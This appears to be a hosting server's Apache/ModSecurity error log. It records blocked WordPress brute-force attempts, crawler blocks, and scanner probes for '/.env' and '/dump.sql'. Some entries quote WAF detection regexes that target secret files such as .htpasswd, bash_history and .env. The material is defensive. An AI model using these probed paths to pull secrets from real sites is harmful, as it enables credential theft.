[Tue May 26 14:32:30.064822 2026] [security2:error] [pid 610693:tid 610784] [remote 46.101.75.237:54590] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 237.75.101.46.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "rohiniventures.com"] [uri "/wp-login.php"] [unique_id "ahVhpTvNO3hpmlY6M8R6VwAAHlo"]
[Tue May 26 14:32:30.651781 2026] [security2:error] [pid 610693:tid 610860] [client 57.141.2.33:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVhpjvNO3hpmlY6M8R6YAAAACU"]
[Tue May 26 14:32:33.028697 2026] [security2:error] [pid 610693:tid 610875] [client 57.141.2.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVhqDvNO3hpmlY6M8R6sQAAADQ"]
[Tue May 26 14:32:34.284875 2026] [security2:error] [pid 610693:tid 610933] [client 146.174.176.58:42206] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.wrapmachines.com"] [uri "/index.php"] [unique_id "ahVhqDvNO3hpmlY6M8R6qwAAAG4"]
[Tue May 26 14:32:34.483843 2026] [security2:error] [pid 610693:tid 610931] [client 202.141.83.254:19926] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 254.83.141.202.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahVhqjvNO3hpmlY6M8R67AAAAGw"]
[Tue May 26 14:32:34.483999 2026] [security2:error] [pid 610693:tid 610931] [client 202.141.83.254:19926] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahVhqjvNO3hpmlY6M8R67AAAAGw"]
[Tue May 26 14:32:34.865460 2026] [security2:error] [pid 610693:tid 610926] [client 57.141.2.49:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVhqjvNO3hpmlY6M8R66wAAAGc"]
[Tue May 26 14:32:34.978651 2026] [security2:error] [pid 610693:tid 610828] [client 154.161.32.97:56480] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 97.32.161.154.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "lmialumni.org"] [uri "/xmlrpc.php"] [unique_id "ahVhqjvNO3hpmlY6M8R69QAAAAU"]
[Tue May 26 14:32:34.978762 2026] [security2:error] [pid 610693:tid 610828] [client 154.161.32.97:56480] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "lmialumni.org"] [uri "/xmlrpc.php"] [unique_id "ahVhqjvNO3hpmlY6M8R69QAAAAU"]
[Tue May 26 14:32:36.394403 2026] [security2:error] [pid 610693:tid 610834] [client 57.141.2.27:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVhqzvNO3hpmlY6M8R7EAAAAAs"]
[Tue May 26 14:32:38.453760 2026] [security2:error] [pid 610693:tid 610696] [remote 163.223.13.54:33152] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 54.13.223.163.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "christinaspromotions.com"] [uri "/wp-login.php"] [unique_id "ahVhrjvNO3hpmlY6M8R7OwAANwI"]
[Tue May 26 14:32:39.005204 2026] [security2:error] [pid 610693:tid 610936] [client 57.141.2.17:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVhrjvNO3hpmlY6M8R7RwAAAHE"]
[Tue May 26 14:32:40.993396 2026] [security2:error] [pid 610693:tid 610833] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVhsDvNO3hpmlY6M8R7cwAAAAo"]
[Tue May 26 14:32:41.610709 2026] [security2:error] [pid 610693:tid 610723] [remote 178.104.164.71:56324] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 71.164.104.178.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "bloggertarget.com"] [uri "/wp-login.php"] [unique_id "ahVhsTvNO3hpmlY6M8R7lAAALx0"]
[Tue May 26 14:32:42.672302 2026] [security2:error] [pid 610693:tid 610912] [client 185.191.171.17:53466] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/robots.txt"] [unique_id "ahVhsjvNO3hpmlY6M8R7ugAAAFk"]
[Tue May 26 14:32:42.672441 2026] [security2:error] [pid 610693:tid 610912] [client 185.191.171.17:53466] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/robots.txt"] [unique_id "ahVhsjvNO3hpmlY6M8R7ugAAAFk"]
[Tue May 26 14:32:43.063751 2026] [security2:error] [pid 610693:tid 610922] [client 57.141.2.10:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVhsjvNO3hpmlY6M8R7uQAAAGM"]
[Tue May 26 14:32:43.697528 2026] [security2:error] [pid 610693:tid 610721] [remote 121.200.216.55:47486] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 55.216.200.121.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "hassina-foundation.com"] [uri "/wp-login.php"] [unique_id "ahVhszvNO3hpmlY6M8R7zQAANxs"]
[Tue May 26 14:32:44.769758 2026] [security2:error] [pid 610693:tid 610930] [client 57.141.2.25:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVhtDvNO3hpmlY6M8R73wAAAGs"]
[Tue May 26 14:32:44.918925 2026] [security2:error] [pid 610693:tid 610826] [client 202.141.83.254:53856] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 254.83.141.202.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahVhtDvNO3hpmlY6M8R77wAAAAM"]
[Tue May 26 14:32:44.919581 2026] [security2:error] [pid 610693:tid 610826] [client 202.141.83.254:53856] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahVhtDvNO3hpmlY6M8R77wAAAAM"]
[Tue May 26 14:32:46.276038 2026] [autoindex:error] [pid 610693:tid 610855] [client 198.235.24.13:0] AH01276: Cannot serve directory /home2/glorolle/public_html/aeromodellingconsultants.com/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 14:32:46.720613 2026] [security2:error] [pid 610693:tid 610917] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVhtjvNO3hpmlY6M8R8NgAAAF4"]
[Tue May 26 14:32:49.240871 2026] [security2:error] [pid 610693:tid 610911] [client 176.65.139.237:23760] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.sandbox.dezka.mx"] [uri "/.env"] [unique_id "ahVhuTvNO3hpmlY6M8R8gQAAAFg"]
[Tue May 26 14:32:49.258702 2026] [security2:error] [pid 610693:tid 610933] [client 57.141.2.48:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVhuDvNO3hpmlY6M8R8dwAAAG4"]
[Tue May 26 14:32:49.314734 2026] [security2:error] [pid 610693:tid 610921] [client 5.255.115.58:50442] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sql$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1288"] [id "350590"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access raw SQL files (disable this rule if you require access to files that end with .sql)"] [severity "CRITICAL"] [hostname "shirdisaibabatemple.org"] [uri "/dump.sql"] [unique_id "ahVhuTvNO3hpmlY6M8R8hQAAAGI"], referer: shirdisaibabatemple.org/dump.sql
[Tue May 26 14:32:50.343760 2026] [security2:error] [pid 610693:tid 610897] [client 165.140.119.146:57873] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 146.119.140.165.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.bloggertarget.com"] [uri "/wp-comments-post.php"] [unique_id "ahVhujvNO3hpmlY6M8R8lgAAAEo"], referer: https://www.bloggertarget.com
[Tue May 26 14:32:50.343865 2026] [security2:error] [pid 610693:tid 610897] [client 165.140.119.146:57873] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "147"] [id "900404"] [msg "wp-comments-post POST logging"] [data "409"] [hostname "www.bloggertarget.com"] [uri "/wp-comments-post.php"] [unique_id "ahVhujvNO3hpmlY6M8R8lgAAAEo"], referer: https://www.bloggertarget.com
[Tue May 26 14:32:52.015653 2026] [security2:error] [pid 610693:tid 610875] [client 57.141.2.26:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVhuzvNO3hpmlY6M8R8uAAAADQ"]
[Tue May 26 14:32:53.356259 2026] [security2:error] [pid 610693:tid 610823] [client 114.119.130.183:21649] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "usteve.com"] [uri "/robots.txt"] [unique_id "ahVhvTvNO3hpmlY6M8R85gAAAAA"]
[Tue May 26 14:32:53.891783 2026] [security2:error] [pid 610693:tid 610944] [client 57.141.2.45:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVhvTvNO3hpmlY6M8R89QAAAHk"]
[Tue May 26 14:32:55.493859 2026] [security2:error] [pid 610693:tid 610949] [client 202.141.83.254:5785] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 254.83.141.202.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahVhvzvNO3hpmlY6M8R9GgAAAH4"]
[Tue May 26 14:32:55.494023 2026] [security2:error] [pid 610693:tid 610949] [client 202.141.83.254:5785] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahVhvzvNO3hpmlY6M8R9GgAAAH4"]
[Tue May 26 14:32:55.534428 2026] [core:error] [pid 610693:tid 610832] [client 74.7.244.40:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 14:32:55.534445 2026] [core:error] [pid 610693:tid 610832] [client 74.7.244.40:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 14:32:55.534566 2026] [security2:error] [pid 610693:tid 610832] [client 74.7.244.40:0] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "500"] [hostname "service.google.com.anujtradingco.com"] [uri "/index.php"] [unique_id "ahVhvzvNO3hpmlY6M8R9IwAAAAk"]
[Tue May 26 14:32:55.535365 2026] [security2:error] [pid 610693:tid 610897] [client 74.7.244.40:49418] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "500"] [hostname "service.google.com.anujtradingco.com"] [uri "/robots.txt"] [unique_id "ahVhvzvNO3hpmlY6M8R9IQAASjY"]
[Tue May 26 14:32:56.277320 2026] [security2:error] [pid 610693:tid 610899] [client 57.141.2.28:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVhvzvNO3hpmlY6M8R9JgAAAEw"]
[Tue May 26 14:32:57.234169 2026] [security2:error] [pid 610693:tid 610861] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVhwDvNO3hpmlY6M8R9OwAAACY"]
[Tue May 26 14:32:57.681045 2026] [security2:error] [pid 610693:tid 610885] [client 14.166.102.228:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVhwTvNO3hpmlY6M8R9SwAAAD4"]
[Tue May 26 14:32:57.711991 2026] [autoindex:error] [pid 610693:tid 610842] [client 198.235.24.18:58872] AH01276: Cannot serve directory /home2/abili6ui/public_html/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 14:32:59.862052 2026] [security2:error] [pid 610693:tid 610863] [client 57.141.2.36:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVhwzvNO3hpmlY6M8R9jQAAACg"]
[Tue May 26 14:33:00.070617 2026] [security2:error] [pid 610693:tid 610936] [client 118.173.88.96:44419] ModSecurity: Warning. Pattern match "/(contact(o|.?us)?|wp-comments-post|(send)?.?(form.)?e?mail(er)?|memberlist|send|contact.form(.handler)?|thankyou|leafmailer[0-9.]*)\\\\.php" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1546"] [id "900923"] [msg "contact form logging"] [hostname "panda-eco.com"] [uri "/wp-comments-post.php"] [unique_id "ahVhwzvNO3hpmlY6M8R9mQAAAHE"]
[Tue May 26 14:33:00.326718 2026] [security2:error] [pid 610693:tid 610908] [client 176.65.139.232:44550] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "cuatrodoce.com.mx"] [uri "/.env"] [unique_id "ahVhxDvNO3hpmlY6M8R9qAAAAFU"]
[Tue May 26 14:33:00.642048 2026] [security2:error] [pid 610693:tid 610809] [remote 74.7.241.58:42842] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 58.241.7.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.billing.mosykay.com"] [uri "/app/password/reset"] [unique_id "ahVhxDvNO3hpmlY6M8R9sgAACnM"], referer: https://www.billing.mosykay.com/app/password/reset?path=/home1/taote1zo/public_html/mosykay.com/account/resources/lang/bn
[Tue May 26 14:33:00.771490 2026] [security2:error] [pid 610693:tid 610936] [client 118.173.88.96:44419] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "147"] [id "900404"] [msg "wp-comments-post POST logging"] [data "302"] [hostname "panda-eco.com"] [uri "/wp-comments-post.php"] [unique_id "ahVhwzvNO3hpmlY6M8R9mQAAAHE"]
[Tue May 26 14:33:00.771560 2026] [security2:error] [pid 610693:tid 610936] [client 118.173.88.96:44419] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "panda-eco.com"] [uri "/wp-comments-post.php"] [unique_id "ahVhwzvNO3hpmlY6M8R9mQAAAHE"]
[Tue May 26 14:33:01.903992 2026] [security2:error] [pid 610693:tid 610950] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVhxTvNO3hpmlY6M8R90AAAAH8"]
[Tue May 26 14:33:02.053411 2026] [security2:error] [pid 610693:tid 610922] [client 118.173.88.96:44489] ModSecurity: Warning. Pattern match "/(contact(o|.?us)?|wp-comments-post|(send)?.?(form.)?e?mail(er)?|memberlist|send|contact.form(.handler)?|thankyou|leafmailer[0-9.]*)\\\\.php" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1546"] [id "900923"] [msg "contact form logging"] [hostname "panda-eco.com"] [uri "/wp-comments-post.php"] [unique_id "ahVhxjvNO3hpmlY6M8R93gAAAGM"]
[Tue May 26 14:33:02.093826 2026] [security2:error] [pid 610693:tid 610922] [client 118.173.88.96:44489] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "147"] [id "900404"] [msg "wp-comments-post POST logging"] [data "429"] [hostname "panda-eco.com"] [uri "/wp-comments-post.php"] [unique_id "ahVhxjvNO3hpmlY6M8R93gAAAGM"]
[Tue May 26 14:33:03.410342 2026] [security2:error] [pid 610693:tid 610926] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVhxjvNO3hpmlY6M8R99AAAAGc"]
[Tue May 26 14:33:03.498160 2026] [security2:error] [pid 610693:tid 610884] [client 118.173.88.96:44544] ModSecurity: Warning. Pattern match "/(contact(o|.?us)?|wp-comments-post|(send)?.?(form.)?e?mail(er)?|memberlist|send|contact.form(.handler)?|thankyou|leafmailer[0-9.]*)\\\\.php" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1546"] [id "900923"] [msg "contact form logging"] [hostname "panda-eco.com"] [uri "/wp-comments-post.php"] [unique_id "ahVhxzvNO3hpmlY6M8R9_AAAAD0"]
[Tue May 26 14:33:03.538030 2026] [security2:error] [pid 610693:tid 610884] [client 118.173.88.96:44544] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "147"] [id "900404"] [msg "wp-comments-post POST logging"] [data "429"] [hostname "panda-eco.com"] [uri "/wp-comments-post.php"] [unique_id "ahVhxzvNO3hpmlY6M8R9_AAAAD0"]
[Tue May 26 14:33:03.998440 2026] [security2:error] [pid 610693:tid 610912] [client 45.33.80.243:2194] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "302"] [hostname "md-74.webhostbox.net"] [uri "/index.cgi"] [unique_id "ahVhxzvNO3hpmlY6M8R9_gAAAFk"]
[Tue May 26 14:33:04.087784 2026] [security2:error] [pid 610693:tid 610929] [client 154.161.32.97:46543] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 97.32.161.154.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "lmialumni.org"] [uri "/xmlrpc.php"] [unique_id "ahVhxzvNO3hpmlY6M8R-AwAAAGo"]
[Tue May 26 14:33:04.087930 2026] [security2:error] [pid 610693:tid 610929] [client 154.161.32.97:46543] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "lmialumni.org"] [uri "/xmlrpc.php"] [unique_id "ahVhxzvNO3hpmlY6M8R-AwAAAGo"]
[Tue May 26 14:33:04.930275 2026] [security2:error] [pid 610693:tid 610950] [client 118.173.88.96:44577] ModSecurity: Warning. Pattern match "/(contact(o|.?us)?|wp-comments-post|(send)?.?(form.)?e?mail(er)?|memberlist|send|contact.form(.handler)?|thankyou|leafmailer[0-9.]*)\\\\.php" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1546"] [id "900923"] [msg "contact form logging"] [hostname "panda-eco.com"] [uri "/wp-comments-post.php"] [unique_id "ahVhyDvNO3hpmlY6M8R-FQAAAH8"]
[Tue May 26 14:33:04.973431 2026] [security2:error] [pid 610693:tid 610950] [client 118.173.88.96:44577] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "147"] [id "900404"] [msg "wp-comments-post POST logging"] [data "429"] [hostname "panda-eco.com"] [uri "/wp-comments-post.php"] [unique_id "ahVhyDvNO3hpmlY6M8R-FQAAAH8"]
[Tue May 26 14:33:05.836742 2026] [security2:error] [pid 610693:tid 610887] [client 202.141.83.254:19962] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 254.83.141.202.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahVhyTvNO3hpmlY6M8R-LQAAAEA"]
[Tue May 26 14:33:05.837234 2026] [security2:error] [pid 610693:tid 610887] [client 202.141.83.254:19962] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahVhyTvNO3hpmlY6M8R-LQAAAEA"]
[Tue May 26 14:33:06.031938 2026] [security2:error] [pid 610693:tid 610927] [client 57.141.2.38:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVhyTvNO3hpmlY6M8R-IgAAAGg"]
[Tue May 26 14:33:06.396610 2026] [security2:error] [pid 610693:tid 610894] [client 118.173.88.96:44597] ModSecurity: Warning. Pattern match "/(contact(o|.?us)?|wp-comments-post|(send)?.?(form.)?e?mail(er)?|memberlist|send|contact.form(.handler)?|thankyou|leafmailer[0-9.]*)\\\\.php" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1546"] [id "900923"] [msg "contact form logging"] [hostname "panda-eco.com"] [uri "/wp-comments-post.php"] [unique_id "ahVhyjvNO3hpmlY6M8R-PQAAAEc"]
[Tue May 26 14:33:06.438980 2026] [security2:error] [pid 610693:tid 610894] [client 118.173.88.96:44597] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "147"] [id "900404"] [msg "wp-comments-post POST logging"] [data "429"] [hostname "panda-eco.com"] [uri "/wp-comments-post.php"] [unique_id "ahVhyjvNO3hpmlY6M8R-PQAAAEc"]
